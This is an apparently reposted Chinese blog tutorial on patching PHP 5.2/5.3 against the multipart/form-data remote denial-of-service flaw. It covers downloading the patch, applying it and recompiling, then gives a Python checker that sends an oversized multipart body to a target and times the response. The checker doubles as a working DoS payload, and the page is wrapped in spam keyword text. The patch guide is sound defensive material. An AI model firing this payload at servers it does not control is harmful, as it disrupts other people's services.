国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 開發 > PHP > 正文

php中Multipart/form-data漏洞補丁修復

2024-05-04 21:50:20
字體:
來源:轉載
供稿:網友

今天在烏云上看到PHP multipart/form-data 遠程DOS漏洞,馬上給同事聯系了下對線上服務器進行打補丁,先給一個centos編譯安裝nginx+php-fpm+mysql的教程,如果是根據我這樣安裝的話,那你們可以繼續按照做下去了,如果不是的話,那么你們就看看吧.

系統:centos 5.x(64位)

需要的軟件:php-5.2-multipart-form-data.patch

1.查看自己php版本

  1. php -v 
  2. PHP 5.2.17p1 (cli) (built: Oct 29 2015 15:31:06)  
  3. Copyright (c) 1997-2010 The PHP Group 
  4. Zend Engine v2.2.0, Copyright (c) 1998-2010 Zend Technologies 

如果版本高于5.3的話,那就直接升級php就可以了.

2.下載補丁文件

  1. wget http://soft.vpser.net/web/php/bug/php-5.2-multipart-form-data.patch 
  2. //或 
  3. wget/php_patch/php-5.2-multipart-form-data.patch 

3.安裝補丁

  1. 5.2: 
  2. cp php-5.2-multipart-form-data.patch ~/install/php-5.2.17/ 
  3. cd php-5.2.17 
  4. patch -p1 < php-5.2-multipart-form-data.patch 
  5.  
  6. 5.3: 
  7. wget http://soft.vpser.net/web/php/bug/php-5.3-multipart-form-data.patch 
  8. patch -p1 < php-5.3-multipart-form-data.patch 

將42行到45行刪除:

  1. if [ “$php_version” == “$old_php_version” ]; then 
  2. echo “Error: The upgrade PHP Version is the same as the old Version!!” 
  3. exit 1 
  4. fi 

4.重新對php進行編譯

  1. ./configure --prefix=/usr/local/php --enable-fastcgi --enable-fpm --with-fpm-log=/var/log/php-fpm.log / 
  2. --with-fpm-conf=/etc/php-fpm.conf --with-fpm-pid=/var/run/php-fpm.pid --with-config-file-path=/etc / 
  3. --with-config-file-scan-dir=/etc/php.d --with-openssl --with-zlib --enable-bcmath --with-bz2 --with-curl / 
  4. --enable-ftp --with-gd --enable-gd-native-ttf --with-jpeg-dir --with-png-dir --with-gettext --with-mhash / 
  5. --enable-mbstring --with-mcrypt --enable-soap --enable-zip --with-iconv=/usr/local/libiconv / 
  6. --with-mysql=/usr/local/mysql --with-mysqli=/usr/local/mysql/bin/mysql_config --without-pear 

PS:你們最好自己查看下自己php的編譯參數,php -i|grep configure

make && make install

好了,這樣就把漏洞整好了,怎么檢測呢?請看下面這個腳本:

  1. cat dd.py 
  2.  
  3. ''
  4. Author: Shusheng Liu,The Department of Security Cloud, Baidu 
  5. email: liusscs@163.com 
  6. ''
  7. import sys 
  8. import urllib,urllib2 
  9. import datetime 
  10. from optparse import OptionParser 
  11.  
  12. def http_proxy(proxy_url): 
  13.  
  14.     proxy_handler = urllib2.ProxyHandler({"http" : proxy_url}) 
  15.     null_proxy_handler = urllib2.ProxyHandler({}) 
  16.     opener = urllib2.build_opener(proxy_handler) 
  17.     urllib2.install_opener(opener) 
  18. #end http_proxy 
  19.  
  20. def check_php_multipartform_dos(url,post_body,headers): 
  21.     req = urllib2.Request(url) 
  22.     for key in headers.keys(): 
  23.         req.add_header(key,headers[key]) 
  24.     starttime = datetime.datetime.now(); 
  25.     fd = urllib2.urlopen(req,post_body) 
  26.     html = fd.read() 
  27.     endtime = datetime.datetime.now() 
  28.     usetime=(endtime - starttime).seconds 
  29.     if(usetime > 5): 
  30.         result = url+" is vulnerable"
  31.     else
  32.         if(usetime > 3): 
  33.             result = "need to check normal respond time" 
  34.     return [result,usetime] 
  35. #end 
  36.  
  37.  
  38. def main(): 
  39.     #http_proxy("http://127.0.0.1:8089"
  40.     parser = OptionParser() 
  41.     parser.add_option("-t""--target", action="store"
  42.                   dest="target"
  43.                   default=False, 
  44.           type="string"
  45.                   help="test target"
  46.     (options, args) = parser.parse_args() 
  47.     if(options.target): 
  48.         target = options.target 
  49.     else
  50.         return
  51.  
  52.     Num=650000 
  53.     headers={'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryX3B7rDMPcQlzmJE1'
  54.             'Accept-Encoding':'gzip, deflate'
  55.             'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'
  56.     body = "------WebKitFormBoundaryX3B7rDMPcQlzmJE1/nContent-Disposition: form-data; name=/"file/"; filename=sp.jpg" 
  57.     payload="" 
  58.     for i in range(0,Num): 
  59.         payload = payload + "a/n" 
  60.     body = body + payload; 
  61.     body = body + "Content-Type: application/octet-stream/r/n/r/ndatadata/r/n------WebKitFormBoundaryX3B7rDMPcQlzmJE1--" 
  62.     print "starting..."
  63.     respond=check_php_multipartform_dos(target,body,headers) 
  64.     print "Result : " 
  65.     print respond[0] 
  66.     print "Respond time : "+str(respond[1]) + " seconds"
  67.  
  68. if __name__=="__main__"
  69.     main() 
本腳本用來檢測的,如果拿去做壞事的話,跟本站無關.

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 沙湾县| 额尔古纳市| 太湖县| 中超| 绍兴市| 和硕县| 武义县| 宁海县| 岗巴县| 新兴县| 尉氏县| 和静县| 无棣县| 张家川| 富源县| 那坡县| 栖霞市| 贵阳市| 马尔康县| 宁远县| 四会市| 旅游| 南康市| 四川省| 大田县| 沾益县| 茶陵县| 班玛县| 商南县| 大厂| 涟源市| 麻江县| 年辖:市辖区| 满城县| 鄯善县| 临沧市| 九龙城区| 祁东县| 湟源县| 侯马市| 上栗县|